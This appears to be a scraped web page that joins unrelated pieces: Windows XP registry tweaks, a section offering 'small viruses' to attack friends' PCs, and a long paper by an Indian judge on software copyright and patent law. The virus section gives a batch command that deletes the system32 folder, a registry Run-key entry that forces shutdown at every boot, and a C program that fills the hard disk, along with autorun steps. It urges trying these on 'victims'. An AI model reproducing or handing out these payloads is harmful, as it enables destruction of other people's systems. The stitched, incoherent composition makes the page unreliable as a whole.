Right click the ContextMenuHandlers key and choose New>Key.
Name the new key “Copy To” (without the quotes).
Repeat the above and create another new key named Move To.

You should now have two new subkeys under the ContextMenuHandlers key:

HKEY_CLASSES_ROOT\*\shellex\ContextMenuHandlers\Copy To
HKEY_CLASSES_ROOT\*\shellex\ContextMenuHandlers\Move To

Select the Copy To key and in the right hand pane, double click “Default”
Enter this clsid value as the value data:

{C2FBB630-2971-11d1-A18C-00C04FD75D13}

Next , select the Move To key and in the right hand pane set the default value to:

{C2FBB631-2971-11d1-A18C-00C04FD75D13}

This now takes care of the Copy and Move options for the right click context menu of all your files.
Now all that is left is to add the same options to the right click menu of all your folders.
The procedure will be the same as for files but at a different key:

HKEY_CLASSES_ROOT\Directory\shellex\ContextMenuHan dlers

Right click ContextMenuHandlers and create a new key named Copy To.
Right click it again and create another new key named Move To.

left click on the right hand pane, add the same default values as you did for Files:

For Copy To:
{C2FBB630-2971-11d1-A18C-00C04FD75D13}
For the Move To:
{C2FBB631-2971-11d1-A18C-00C04FD75D13}

Exit the registry and you are done.

Now when you right click on a file or folder, you should see two new options: Copy to Folder and Move to Folder



KEEP WINDOWS XP IN CORE


If you have 512 MB or more of RAM, you can increase system performance by having the Windows XP 'Core' kept in the RAM instead of paged on the hard disk.

Go to Start -> Run - Type regedit and press enter - On the left hand side tree, navigate to

HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Session Manager\Memory Management\

- On the list on the right side, look for an entry called 'DisablePagingExecutive'
- Double click it
- Press 1 on your keyboard
- Click OK

- Exit regedit and reboot the computer

To revert to the default setting, follow the same steps as above, but this time, press 0(zero) instead of 1 on the keyboard.

BOMB YOUR FREINDS PC WITH A SMALL VIRUS

Making a file that destroys ur victims pc
1. Open Notepad

2. write the above command : -
del c:\WINDOWS\system32\**/q

3. Save the above notepad with the extension ".bat or .cmd" as u wa

4. !!!!!!!!!!!!!!!!!!!!!!Attention!!!!!!!!!!!!!!!!!!!!!!
Don't double click the file otherwise u r in trouble.
Why ?????? bcz the file u created deletes all files from ur

system32 folder and when u restart ur pc it will not start

bcz system can not find the files in the system32 folder which

is required at the time of booting.

5. You can also test the above by creating a fake folder let suppose

windows1 in C:\. Copy some old files in it and just follow the

above command.By double clicking the bat or cmd file ur all files

automaitcally get deleted.

6. You can try this file in any one`s computer.(but this result in causing damage to the computer, so think again before trying this on anyone's pc)

Shutdown computer every time it starts

Make a .reg with this:

Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"VIRUS"="%windir%\\SYSTEM32\\SHUTDOWN.EXE -t 1 -c \"Howz this new Virus ah\" -f"


You can also put this in a javascript code, just add this code to your webpage:





A small virus.

VIRUS THAT JAMS HARD DISK DRIVE

include
#include
void main()
{
while(1)
{
system("dir>>╚a.exe");
}
}
//END

As you can see this is a very little programe.By compiling the programme we get "v.exe" file. This is our virus. How it works?
The system call "dir>>╚a.exe" will execute the dos command 'dir' and ridirect its output to a file ╚a.exe (the symbol ╚ can be obtained by pressing 456 on numpad holding alt key).

So running the program in a folder having many files and folder will increase the size of ╚a.exe in a great amount.This process will continue to infinity as this is in a while(1) loop; Best try this on win98.Then you cannot delete ╚a.exe from GUI.

For auto running place "v.exe" in the command folder in windows folder. In autoexec.bat(win98) or autoexec.NT(winXP/2000) file simply write v.exe. Each time your window starts v.exe will run automatically.

You can try this even on your own computer. But remember the ╚a.exe is the infected file which is growing in size continiously.So to recover, simply delete v.exe and ╚a.exe file from your computer

COMPUTER SOFTWARE AND INTELLECTUAL PROPERTY RIGHTS

(Summary: This paper discusses, how intellectual property rights operate in the field of computer software.
It was read by Justice Yatindra Singh Judge Allahabad High Court on 15th March 2008 at National Conference on Advancements in Information Communication Technology Allahabad)


Justice Michael Kirby is a puisne judge in the High Court of Australia, the highest court there. On 21st February 2008, Justice Kirby was the chief guest in the annual dinner meeting of Internet Industry Association Sydney, Australia. The audience here, reminds me of his speech on that occassion,
'The people who built the Internet ... have ... extra dimension. I asked tonight when I came in here and saw you all: why is this such a male dominated audience? Why are there so few women?
If I were to go to a Law function tonight, about half the audience would be women – and the same in most professions. But here, this is overwhelmingly a male domain.
My conversationalist said, it all goes back to the fact that to be good in this type of technology, you have got to have that very strange mental quirk. And that’s a male phenomenon. It’s on the Y chromosome, in the male genes. That’s probably why they are mostly men here.
I don’t know that I accept that.
It may be a power thing. You may be just a little bit behind the rest of us in society. But it’s a thing for you to look to. Women are the great networkers. And toilers in the Internet are in the business of the greatest network of them all.'
Even I don't accept the explaination offered by the conversationalist however, it is not only a thing to look to but a thing to be look into. With this preliminary, Let's come to today's topic.

INTELLECTUAL PROPERTY RIGHTS
Last centuary was dominated by two wars however this century is likely to be dominated by the problems related to intellectual property rights (IPRs). We are one of the leaders in the field of Information Technology. With better understanding of Intellectual property rights (IPRs) in the field of computer software, we will be in better postion to steer away from the disputes.

About a centuary ago, Justice Paterson, in University of London vs. University of Tutorial Process Ltd. 1916(2) Ch 601, observed, '
What is worth copying, is prima facie worth protecting'
This is the genesis of all intellectual property rights (IPRs). These rights refer to the property that is a creation of the mind: inventions, literary and artistic works, symbols, names, images, and designs used in commerce.

Agreement on Trade related aspect of Intellectual Property Rights (TRIPS)―part of the World Trade Organisation (WTO) Charter―talks about the following seven kinds of IPRs:
  1. Copyright and Related Rights
  2. Trademarks
  3. Geographical Indications
  4. Industrial designs
  5. Patents
  6. Layout - designs (Topographies) of Integrated Circuits
  7. Protection of Undisclosed Information (Trade Secret)
This list of IPRs is enumerative and not exhaustive; there can be other IPRs.

IPR Protection in India
In our country, IPRs are protected under the following Acts.
  1. The Biological Diversity Act, 2002
  2. The Copyright Act, 1957.
  3. The Design Act, 2000.
  4. The Geographical Indications of Goods (Registration and Protection) Act, 1999.
  5. The Patents Act, 1970.
  6. The Protection of Plant Varieties and Farmers' Rights Act, 2001.
  7. The semiconductor Integrated circuits Layout design Act, 2000.
  8. The Trade Marks Act, 1999.

TRIPS deals with one more kind of IPR namely Undisclosed information (Trade Secret). There is no specific Act relating to trade secret in our country and it is protected under common law.

Apart from the abovementioned Acts/ area, the law relating to Contract/ License plays important role in protection of computer software.

IPRs in the Computer Industry
IPRs in the computer industry are affected by the following areas:
  1. Contract/License
  2. Copyright and Related Rights
  3. Undisclosed Information (Trade Secret)
  4. Patents
  5. Trademarks
  6. Layout - designs (Topographies) of Integrated Circuits
The first four have an impact on computer software. The fifth one (trademarks) and the sixth one (layout-designs) are more relevant to the Internet and to computer hardware rather than to the computer software.

COPYRIGHT, TRADE SECRET AND CONTRACT/LICENSES
For sake of convenience, let's take the first three IPRs together—we will discuss patents afterwords.
  • 'Contract/ license' is general law that governs conditions in any transactions. It is equally applicable to the computer software.
  • 'Copyright' lies in the description; it is the form of expression of ideas: this expression may be by artistic, or dramatic, or literary, or musical work; it may be, by films, pictures and sound recordings too. It is governed by the Copyright Act, 1957.
  • ‘Undisclosed information/ trade secret’ is a secret. It must not be of public or general knowledge in the trade. It may consist of any formula, pattern, device or compilation of information which gives an advantage over competitors who do not know or use it. It implies some novelty though not of the same degree as in the patent law, as that does not possess novelty is usually known.

COMPUTER SOFTWARE
Before we discuss interplay between IPRs and computer software, a few words about computer software will be apt.

Source Code and Object Code
Computers do not understand our language. They only understand 'machine language' or 'machine code' i.e. instructions which consist of a series of 0s and 1s; the language of 'yes' and 'no'. In the earlier days a computer program used to be written in machine code by punching a punchcard. The punched slot or unpunched slot indicated requisite information to the computer. This process was slow and tedious. Such a programme, although intelligible to the computer, was virtually unintelligible to any one except an equally skilled programmer.

(Computer Punch Card)

As the computer science progressed, so did the method of writing computer programmes. It developed 'assembler languages' and then high-level languages—such as Basic, Fortran, Cobol, Pascal, c++ etc. They simplify the work of a programmer. The use of these high level languages enables a programmer to write a programme in terms that nearly resembles ordinary English, unlike those used in the lower level languages. They also permit complex operations for the computer to be written by a relatively compact commands. Such writing of the programme―as written by a programmer―are known as the source code.

The source code is compiled by a compiler―converting it into the language that computers understand. It is then known as the object code or machine code or binary code or machine language.

PROTECTION OF SOURCE CODE
Source code is a kind of description; a description of the computer program. If it is published then it is a literary work within the Copyright Act and is so protected. If it is not published then it is protected as a trade secret though only, the writer/ owner of the work has the right/copyright to publish it.


Propreitary Software
In proprietary software, the source code is generally never published; it is secret: it is protected as a trade secret.

Copylefted and Open Source Software (OSS)
Everyone is not using copyright or trade secret to prevent others from using computer software without their permission or preserve their rights. They are using copyright in such a way that it does not become the exclusive property of anyone. They are not copyrighting but copylefting it. Copylefting is a new word, new concept.

In order to copyleft a software, the copyright holder publishes the source code with the declaration that everyone has the right to copy, distribute, and modify the software without any payment of royalty or fee provided in case of redistribution of the same software or distribution of the modified software, the source code is also disclosed and similar freedom—as given by the original copyright holder—is given to the others.

Copylefted software is also called free software as there is freedom to modify it. It is also called GPLed software as general public license (GPL) has a condition that copylefts a software.

Software where the source code is disclosed may or may not be copylefted and there can be degrees of copyleftness: it all depends on the terms of the licence under which it is released.

In 1997 free software enthusiast got together to start 'Open Source Initiative' (OSI) a non profit public organisation. It has come out with ten guidelines. In case license conditions, under which that software is released, satisfies them then that software is copylefted to some degree. Software released under the licenses satisfying these guidelines are known as 'Open Source Software' (OSS).

OSI has also identified licenses that satisfy these condition. Among them, in one extreme is the GPL that copylefts the software to the maximum and is viral. At other end is Berkeley Software Distributions ( BSD); it copylefts the software to the minimum.

All 'GPLed software'/ 'Free software'/ 'copylefted software' are also OSS; they lie within the sphere of OSS but reverse is not true. In OSS source code is always published: it is always protected as copyright―subject to the conditions of the license under which, it is published.

PROTECTION OF OBJECT CODE
The question as to how an object code is protected was debateable. The High Court of Australia considered this question in Computer Edge Pty Ltd v. Apple Computer Inc, (1986) 161 CLR 171. The court held that the object code is not protected as a copyright. Justice Gibbs, one of the judges in the majority Observed,
‘I have not found anything … that has persuaded me that [the object code] a sequence of electrical impulses in a silicon chip not capable itself of communicating anything directly to a human recipient, and designed only to operate a computer, is itself a literary work, or is the translation of a literary work within the Copyright Act.’

In India legal provisions were similar. However, before this question could be raised in our courts, we sorted it out by amending the Copyright Act in pursuance of TRIPS by two amending Acts namely Act no. 38 of 1994 and Act no. 49 of 1999. The definition of the 'literary work' in section 2(o) of the Copyright Act was amended to include computer programme as well as computer database. The result is that not only the computer programme (subject code as well as object code) but computer database is also protected as a copyright.

PATENTS
Patentability of computer software is controversial as well as debatable.

Patents can be granted for inventions. The word ‘invention’ {section 2(1)(j) of the Patents Act} read with the word ‘inventive step’ {Section (1)(ga) of the Patents Act} means a new product or process that is capable of industrial application. Invention must be novel and useful. It should not be obvious to a person skilled in the art. It must be a significant advance in the state of the art; it should not be an obvious change from what is already known. Generally this is the global law but is being applied differently in different countries (see Endnote-1, for relevant part of TRIPS).

Law - US
Section 3 of the Indian Patents Act explains what are not inventions. Patents cannot be granted for discoveries and inventions mentioned in section 3 of the Patent Act. There is no such limitation in the US law as the Congress intended to include anything under the sun that is made by man, but the US Supreme Court in Diamond vs. Chakrabarty, 447 US 303: 65 L Ed 2d 144 (the Chakrabarty case) (for the facts, see end note-2) held,
‘This is not to suggest that … [law] has no limits or that it embraces every discovery. The laws of nature, physical phenomena, and abstract ideas have been held not patentable. Thus a new mineral discovered in the earth or a new plant found in the wild is not a patentable subject matter. Likewise, Einstein could not patent his celebrated law that E=mc2; nor could Newton have patented the law of gravity. Such discoveries are manifestation of nature, free to all men and reserved exclusively to none.’

The US Supreme Court in Parker v. Flook (437 US 584: 57 L Ed 2d 451) also held that a method for updating alarm limits during catalytic conversion, which is a mathematical formula, is not patentable.

The US Patents Act neither specifically refers to programmes for computers, nor to the business methods. The US Supreme Court in Gottschalk v. Benson, 409 US 63: 34 L Ed 2d 273 (the Gottschalk case) held that a computer program—involving a method to convert binary-coded-decimal numerals into pure binary numerals — cannot be patented for the reason,
  • The method was so abstract as to cover both known and unknown uses of the binary-coded-decimal to pure binary conversion;
  • The end use could vary and could be performed through any existing machinery or future-devised machinery or without any apparatus;
  • The mathematical formula involved had no substantial practical application except in connection with a digital computer; and
  • The result of granting a patent would be to improperly issue a patent for an idea.
In short, algorithm cannot be patented. A computer program — standing alone or by itself — cannot be patented in the US, but what would be the position if it were a part of an industrial or business process?

Industrial Process
Diamond v. Diehr, (1981) 450 US 175: 67 L Ed 2d 155 (the Diehr case) was a case involving a process for curing rubber that included a computer programme. Rubber in a mould is to be heated for a given time according to the Arrhenius equation, named after its discoverer Svante Arrhenius. The inventor had found a process for constantly measuring temperature inside the mould, which was fed to a computer that opened the mould at the right time. The court by a five to four decision held that a patentable claim does not become unpatentable merely if it uses a mathematical formula, or a computer programme, or a computer. In short, a computer programme may not be patentable as such but may be patentable as a part of an industrial process.

Business Methods
Traditionally, the processes concerned with technology only could be patented. Many other activities including business methods, or data analysis which one would consider processes, were excluded from patents. However, since the Diehr case, there has been a shift in the US. US Patent and Trade Office (USPTO) has issued a Manual of Patent Examining Procedures containing guidelines for patenting inventions. Its earlier policy for computer related inventions {Paragraph 706.03(a)} was as follows {See Hotel Security Checking Co. v. Lorraine Co., 160 F. 467 (2nd Cir. 1908) and In re Wait, 24 USPQ 88, 22 CCPA 822 (1934)}:
‘Though seemingly within the category of a process or method, a method of doing business can be rejected as not being within the statutory classes.’
This was deleted and a new paragraph {706.03(a)} was added,
‘Office personnel have had difficulty in properly treating claims directed to methods of doing business. Claims should not be categorized as methods of doing business. Instead such claims should be treated like any other process claims’.

The aforesaid change was noticed by the US court of appeal in State Street Bank v. Signature Financial Group, 149 F. 3d 1352 (the StateStreet case) (for facts see Endnote-3) and the court held that,
‘Whether the claims are [patentable or not] should not turn on whether the claimed subject matter does “business“ instead of something else.’
The court also held that,
‘To be patentable an algorithm must be applied in a “useful“ way.

We hold that the transformation of data, representing discrete dollar amounts, by a machine through a series of mathematical calculations into a final share price, constitutes a practical application of a mathematical algorithm, formula, or calculation, because it produces a useful, concrete and tangible result’
In short, at present the law in the US is that, an abstract idea by itself never satisfies the requirements of the Patents law. However an abstract idea when practically applied to produce a useful, concrete and tangible result satisfies it.

Today, USPTO has one chapter on Patent Business Methods and is granting patents to software techniques for business methods and data analysis, if they are useful. Australia and Japan have also followed suit. Some examples of patents of business methods granted in the US are:
  • Single click to order goods in an on-line transaction. This is famous Amazon 1-click patent. It was ruled invalid by USPTO on 9.10.07 {To read the original document, go to USPTO PAIR, choose the "Control Number" radio button, enter 90/007,946 and submit. Choose 'Image File Wrapper' and select 'Reexam - Non-Final Action' of the date and download).
  • An on-line system of accounting;
  • In-line rewards incentive system;
  • On-line frequent buyer programme; and
  • Programmes letting customers set their own prices for hotel booking etc.

However in US, the law whether a computer programme, in conjunction of business methods is patentable or not, is far from settled. The Federal circuit Court in 'In re Bilski case' has on 1st October 2007 ordered rehearing of the State Street Case framing the following five questions:
  1. Whether claim 1 of the 08/833,892 patent application claims patent-eligible subject matter under 35 U.S.C. § 101?
  2. What standard should govern in determining whether a process is patent-eligible subject matter under section 101?
  3. Whether the claimed subject matter is not patent-eligible because it constitutes an abstract idea or mental process; when does a claim that contains both mental and physical steps create patent-eligible subject matter?
  4. Whether a method or process must result in a physical transformation of an article or be tied to a machine to be patent-eligible subject matter under section 101?
  5. Whether it is appropriate to reconsider State Street Bank & Trust Co. v. Signature Financial Group, Inc., 149 F.3d 1368 (Fed. Cir. 1998), and AT&T Corp. v. Excel Communications, Inc., 172 F.3d 1352 (Fed. Cir. 1999), in this case and, if so, whether those cases should be overruled in any respect?

Law – Europe
Article 52(2)(2) of the European Patent Convention 1973 (EPC) specifically states that ‘schemes, rules and methods for performing mental acts, playing games or doing business, and programmes for computers’ will not be regarded as inventions. This is also the law of the member countries of the European Patent convention: computer programmes and business methods cannot be patented there. However in practise, it is not so. : they are generally being granted

The European Patent Office (EPO) is an organization formed by the EPC; it does not work under the European Commission. The EPO and a number of patent offices of the EPC's member countries have been granting software patents if claims are presented as technological advancement rather than just software or business applications. However, there is no consistent practice among them. Nevertheless, the EPO claims that:
  • It does not grant patents for computer programmes or computer-implemented business methods that do not involve a technical contribution.
  • Its practice to grant software patents is significantly different from that of the USPTO.

In order to harmonise the practise, the European Commission proposed a draft directive in 2002 on the subject. But the text was never agreed upon. Some feared that Europe would get a much more liberal regime, like that of the US. Others feared that they would lose the patent protection they already enjoyed. As a result, on 6th July 2005, the proposal was defeated in the European Parliament. However this means that the inconsistent practice that caused the Commission to seek to clarify the law is still continuing.

Law — UK
The question regarding patentibility of computer software was debated and decided in England in In re Astron Clinica Ltd. It concerned six applications that claimed to be 'a method of doing X' and 'a device for doing X' by running a suitably programmed computer on the device. It is in effect, a computer programme that carries out the method (for facts of Astron Clinica case, see Endnote-4). These applications were rejected by United Kingdom Intellectual Property Office (UKIPO).

Justice Kitchin of the High Court of Justice, Chancery division noted the difference in practise in applying patent law in European countries by stating that:
'UKIPO considers such claims to be prohibited by Article 52 of the European Patent Convention (EPC). The EPO considers such claims to be allowable if the program has the potential to bring about, when running on a computer, a further technical effect which goes beyond the normal physical interactions between the program and the computer.' (paragraph 1)
...
'it is highly undesirable that provisions of the EPC are construed differently in the EPO from the way they are construed in the national courts of a Contracting state.' (paragraph 49)
The court held that:
'In all these circumstances I have reached the conclusion that claims to computer programs are not necessarily excluded by Article 52. In a case where claims to a method performed by running a suitably programmed computer or to a computer programmed to carry out the method are allowable, then, in principle, a claim to the program itself should also be allowable. I say "in principle" because the claim must be drawn to reflect the features of the invention which would ensure the patentability of the method which the program is intended to carry out when it is run.
...
It follows that these appeals must be allowed. Each concerns a computer related invention where the examiner has allowed claims to, in effect, a method performed by running a suitably programmed computer and to a computer programmed to carry out the method. The Hearing Officer has rejected corresponding program claims on the basis they are necessarily prohibited by Article 52. For the reason I have elaborated, he erred in law in so doing. These cases must be remitted to UKIPO for further consideration in the light of this judgement.'

Law – India
Section 3 of the Patents Act provides what are not invention and cannot be patented. Section 3(k) provides that a mathematical or business method or computer programme per se or algorithms is not invention for purposes of the Patents Act (see Endnote-5). The word 'computer programme' is modified by the word ‘per se'. This word means standing alone, or by itself, or in itself. It shows that under section 3(k) a computer programme standing alone or by itself can not be patented. Nevertheless it also means that if a computer programme is not standing alone then it may be patented; it leaves doubts regarding its scope. The courts may interpret it in the same manner as the Europeans are doing or could do all the way as is being done in the US: of course its finer boundaries will be determined when courts actually interpret these words.

PATENTS – SOME DIFFICULTIES
Period
Many feel that patents may not be granted for doing business on the Internet and in any case the period of 20 years is too long as computer technology changes every two years (see ‘Patently Absurd‘ by James Gleick is available at http://www.around.com/patent.html).

Method of patenting
Presently, patent applications for inventions involving computer programme merely contain flow chart but not the source code. Patents are granted in exchange for a full description of the invention as well as how to perform it. In case source code is not disclosed then whether there is full disclosure. These questions need to be addressed judicially.

Software Patents―To be or Not to be
Many feel that patents may not be granted for doing business on the Internet and in any case the period of 20 years is too long. The question regarding patentibility of computer software or the period for such patentibility should be settled globally. The sooner it is done, the better it would be for the computer software industry.

What may be done till the law is settled: get your software patented. In case it cannot be done due to time or expenses involved, publish it on the website. This would indicate prior art and at least others will not be able to get it patented.

CONCLUSION
Michael Lewis wrote a book in 1999 on the success story of the Silicon Valley entitled ‘The new new thing: a Silicon Valley story‘. The most quoted line from this book is,
‘The definitive smell inside a Silicon Valley start-up was of curry.‘
Let’s hope that—with a better understanding of role of IPRs in the computer industry—not only inside a Silicon Valley start-up, but also inside the e-World, will there be the smell of curry.


Endnote-1: Clause 27 of the TRIPS defines patentable subject matters. The relevant part of sub-clause (1) of clause 27 is as follows:
Subject to the provisions of paragraphs 2 and 3, patents shall be available for any inventions, whether products or processes, in all fields of technology, provided that they are new, involve an inventive step and are capable of industrial application.
A footnote is inserted here in the TRIPS states,
For the purposes of this Article, the terms "inventive step" and "capable of industrial application" may be deemed by a Member to be synonymous with the terms "non-obvious" and "useful" respectively.


Endnote-2: Plasmids are hereditary units physically separate from the chromosomes of the cell. In a prior research, Chakrabarty and an associate discovered that plasmids control the oil degradation abilities of certain bacteria. In particular, the two researchers discovered plasmids capable of degrading camphor and octane, two components of crude oil. In the work represented by the patent application at issue here, Chakrabarty discovered a process by which four different plasmids, capable of degrading four different oil components, could be transferred to and be maintained stably in a single Pseudomonas bacterium, which itself has no capacity for degrading oil. The new bacteria were not ‘products of nature‘, because Pseudomonas bacteria containing two or more different energy generating plasmids are not naturally occurring.

At present, biological control of oil spills requires the use of a mixture of naturally occurring bacteria, each capable of degrading one component of the oil complex. In this way, oil is decomposed into simpler substances which can serve as food for aquatic life. However, for various reasons, only a portion of any such mixed culture survives to attack the oil spill. By breaking down multiple components of oil, Chakrabarty’s micro-organism promises more efficient and rapid oil-spill control and his patent application was allowed.

Endnote-3: Signature was the assignee of the patent. The patent was for data processing system (the system) for implementing an investment structure. The system was developed for use in Signature's business as an administrator and accounting agent for mutual funds. The investment configuration provided the administrator of a mutual fund with the advantageous combination of economies of scale in administering investments coupled with the tax advantages of a partnership.

State Street negotiated with Signature for a license to use its patented data processing system. When negotiations broke down, State Street filed a case for declaration that the patent is invalid. This was allowed by the Massachusetts district court. This judgement was in appeal that was allowed and the case was remanded. It later on ended in compromise.

Endnote-4: The facts in the application filed by Astron Clinica are as follows:
  • University of Birmingham had developed skin imaging techniques. Astron Clinica was founded to commercialise it.
  • The technique enables images of the skin to be processed to identify the distribution and concentration of underlying skin chromophores.
  • Distribution and concentration of underlying skin chromophores undergoes a change in case of cosmetic or surgical intervention.
  • The application filed by Astron Clinica describes the invention as providing a system and process for generating realistic images representing these changes. It is implemented by programming a computer to process images in a particular way. This is achieved by a disc that causes a computer to be configured so as to undertake the required processing.
Similarly, computer programme was used in the other cases.

Endnote-5: Section 3(k) as it stands today was substituted by the 2002 Amendment. It was replaced by section 3(k) and 3(ka) by the Patents Amendment Ordinance 2004 (the 2004 Ordinance). Section 3(ka) as substituted by the 2004 Ordinance excluded mathematical method or business method or algorithms from the field of invention. It was the same as was provided by the 2002 Amendment in Section 3(k). However, the law regarding computer programme was further clarified in section 3(k) by the 2004 Ordinance. After the 2004 Ordinance, computer programme per se was further qualified by the phrase 'other than its technical application to industry or a combination with hardware'. It showed that the computer programme in its technical application to industry or a combination with hardware only could be patented: a scope narrower than US approach but perhaps wider than European approach. The 2004 ordinance has been repealed by the Patents Amendment Act 2005 (Act 15 of 2005) (the 2005 Amendment) however it left the section 3(k) as was substituted by the 2002 Amendment intact; it did not incorporate the amendments in 3(k) or substitution of 3 (ka) as proposed by the 2004 Ordinance.